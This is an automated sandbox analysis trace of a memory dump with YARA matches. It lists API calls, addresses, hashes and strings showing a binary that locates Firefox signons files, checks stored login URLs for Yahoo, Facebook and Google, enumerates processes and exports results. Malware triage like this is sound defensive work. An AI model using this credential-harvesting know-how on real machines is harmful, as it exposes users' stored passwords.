                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                  • memset.MSVCRT ref: 00406E17
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                  • memset.MSVCRT ref: 00406E69
                                                  • memset.MSVCRT ref: 00406E81
                                                  • memset.MSVCRT ref: 00406E99
                                                  • memset.MSVCRT ref: 00406EB1
                                                  • wcslen.MSVCRT ref: 00406EBC
                                                  • wcslen.MSVCRT ref: 00406ECA
                                                  • wcslen.MSVCRT ref: 00406EF9
                                                  • wcslen.MSVCRT ref: 00406F07
                                                  • wcslen.MSVCRT ref: 00406F36
                                                  • wcslen.MSVCRT ref: 00406F44
                                                  • wcslen.MSVCRT ref: 00406F73
                                                  • wcslen.MSVCRT ref: 00406F81
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00407074
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
                                                  • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                  • API String ID: 1908949080-2435954524
                                                  • Opcode ID: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                  • Instruction ID: 8f96e2222c77d76af5181fd0f533d019f0899d465181413e0b466bd376840954
                                                  • Opcode Fuzzy Hash: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                  • Instruction Fuzzy Hash: 8871B07180461AABDB21EF61DC41A9E77BCFF04318F1004AEF909F2181E779AE548F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                  • GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                  • VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                  • _snwprintf.MSVCRT ref: 00441CC6
                                                  • wcscpy.MSVCRT ref: 00441CF0
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00441DA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  • API String ID: 1223191525-1542517562
                                                  • Opcode ID: 76175b8a86119ebe01a83dcd535ce8ac3cdcc4dd7478e422eacbcfec517dbd2c
                                                  • Instruction ID: 5dc843b0b2888ef0cde47c2e58fd974eed7f8edc5a370bbe46a7031584b3d011
                                                  • Opcode Fuzzy Hash: 76175b8a86119ebe01a83dcd535ce8ac3cdcc4dd7478e422eacbcfec517dbd2c
                                                  • Instruction Fuzzy Hash: 044143B2940618BAE704EFA1EC82DDEB7BCFF08744B400557B505A3151DB78BA85CBE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C912
                                                  • memset.MSVCRT ref: 0040C927
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                  • LoadImageW.USER32 ref: 0040C9F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                  • LoadImageW.USER32 ref: 0040CA15
                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                  • GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
                                                  • DeleteObject.GDI32(?), ref: 0040CA65
                                                  • DeleteObject.GDI32(?), ref: 0040CA6B
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 304928396-0
                                                  • Opcode ID: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                  • Instruction ID: 0a3ff62ab3886bf523a191411b010267208ec01492d8cd9208f2635b8a46902f
                                                  • Opcode Fuzzy Hash: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                  • Instruction Fuzzy Hash: A541B871640304BFE7209F70CC8AF97B7ACFB09B45F000929F399A51D1C6B5A9408B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004064AD
                                                    • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                  • _wcsnicmp.MSVCRT ref: 00406520
                                                  • memset.MSVCRT ref: 00406544
                                                  • memset.MSVCRT ref: 00406560
                                                  • _snwprintf.MSVCRT ref: 00406580
                                                  • wcsrchr.MSVCRT ref: 004065A7
                                                  • CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
                                                  • wcscpy.MSVCRT ref: 004065FC
                                                  • memset.MSVCRT ref: 004064FA
                                                    • Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21
                                                  • RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                  • wcscpy.MSVCRT ref: 00406642
                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                  • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                  • API String ID: 1094916163-2797892316
                                                  • Opcode ID: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                  • Instruction ID: 63e98d9b0590a06fe0611c8d8f76d67a06a86b9579f74a21c863053dc4382b5e
                                                  • Opcode Fuzzy Hash: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                  • Instruction Fuzzy Hash: F5515472D00218BAEF20EB61DC45ADFB7BCAF04354F0104A6F905F2191EB799B94CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  • Opcode ID: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                  • Instruction ID: 1bdd15307226dc02cd036ffdab734ce65306a7f25c134a46d7f370f8b7d92746
                                                  • Opcode Fuzzy Hash: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                  • Instruction Fuzzy Hash: 2C31E9B2900305BEEB20AA559E82DBF73BCDF41715F60405FF214E21C2DABC9E859A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  • Opcode ID: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                  • Instruction ID: df14504fdc59ccf6a8c55cbe4aacceea24f9204784c5926a31105bf4aba29bc2
                                                  • Opcode Fuzzy Hash: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                  • Instruction Fuzzy Hash: 8E018478D40314BBEB119F71AC09B563EA9F7187967180977F41862272DBB98810EE8C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040BED5
                                                  • memset.MSVCRT ref: 0040BEFF
                                                  • memset.MSVCRT ref: 0040BF15
                                                  • memset.MSVCRT ref: 0040BF2B
                                                  • _snwprintf.MSVCRT ref: 0040BF64
                                                  • wcscpy.MSVCRT ref: 0040BFAF
                                                  • _snwprintf.MSVCRT ref: 0040C03C
                                                  • wcscat.MSVCRT ref: 0040C06E
                                                    • Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3
                                                  • wcscpy.MSVCRT ref: 0040C050
                                                  • _snwprintf.MSVCRT ref: 0040C0AD
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1277802453-601624466
                                                  • Opcode ID: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                  • Instruction ID: c023c2c05774347514c90e9c4a79a5fc261e79551634f2018d74b142c4ca0a41
                                                  • Opcode Fuzzy Hash: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                  • Instruction Fuzzy Hash: 6B619E31900208EFEF14EF94CC86EAEBB79EF44314F50419AF905AA1D2DB75AA51CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  • Opcode ID: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                  • Instruction ID: df620ac0873104ba588d68bc57a3bc16e82c0a505241d1212890b0a23309d9f4
                                                  • Opcode Fuzzy Hash: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                  • Instruction Fuzzy Hash: 03418371D402197AEB20EB55DD41EFB727CFF04304F4401AAB509E2181EB749B948F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
                                                    • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
                                                    • Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                    • Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                    • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                    • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                    • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                    • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                    • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                    • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                    • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
                                                    • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                    • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
                                                    • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                    • Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035FF
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403614
                                                  • LoadIconW.USER32(00000000,00000074), ref: 00403619
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403628
                                                  • LoadIconW.USER32(00000000,00000073), ref: 0040362D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
                                                  • LoadIconW.USER32(00000000,00000075), ref: 00403641
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403650
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403655
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403664
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403669
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 792915304-0
                                                  • Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                  • Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
                                                  • Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                  • Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                    • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                  • free.MSVCRT(00000000), ref: 00408F8C
                                                    • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                  • memset.MSVCRT ref: 00408E72
                                                    • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                    • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                  • wcschr.MSVCRT ref: 00408EAA
                                                  • memcpy.MSVCRT ref: 00408EDE
                                                  • memcpy.MSVCRT ref: 00408EF9
                                                  • memcpy.MSVCRT ref: 00408F14
                                                  • memcpy.MSVCRT ref: 00408F2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  • API String ID: 3849927982-2252543386
                                                  • Opcode ID: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                  • Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
                                                  • Opcode Fuzzy Hash: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                  • Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406BDC
                                                    • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                  • memset.MSVCRT ref: 00406C0B
                                                  • memset.MSVCRT ref: 00406C2B
                                                  • memset.MSVCRT ref: 00406C40
                                                  • strcmp.MSVCRT ref: 00406C64
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406DC3
                                                  • CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                                  • String ID: ---$Rp@
                                                  • API String ID: 2784192885-2834202798
                                                  • Opcode ID: 7cf5505fde5f7a6ca81fe01c549bb0ad296e6a7104cc4401806f668b22f45092
                                                  • Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
                                                  • Opcode Fuzzy Hash: 7cf5505fde5f7a6ca81fe01c549bb0ad296e6a7104cc4401806f668b22f45092
                                                  • Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • memset.MSVCRT ref: 0040AA6A
                                                  • memset.MSVCRT ref: 0040AA86
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                    • Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                    • Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                    • Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                    • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                    • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                    • Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
                                                    • Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0
                                                  • wcscpy.MSVCRT ref: 0040AACA
                                                  • wcscpy.MSVCRT ref: 0040AAD9
                                                  • wcscpy.MSVCRT ref: 0040AAE9
                                                  • EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
                                                  • EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
                                                  • wcscpy.MSVCRT ref: 0040AB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  • API String ID: 3037099051-517860148
                                                  • Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                  • Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
                                                  • Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                  • Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                  • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                  • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                  • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                  • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                  • API String ID: 2238633743-1621422469
                                                  • Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                  • Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
                                                  • Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                  • Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00410DED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-70141382
                                                  • Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                  • Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
                                                  • Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                  • Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2081463915-1959339147
                                                  • Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                  • Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
                                                  • Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                  • Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
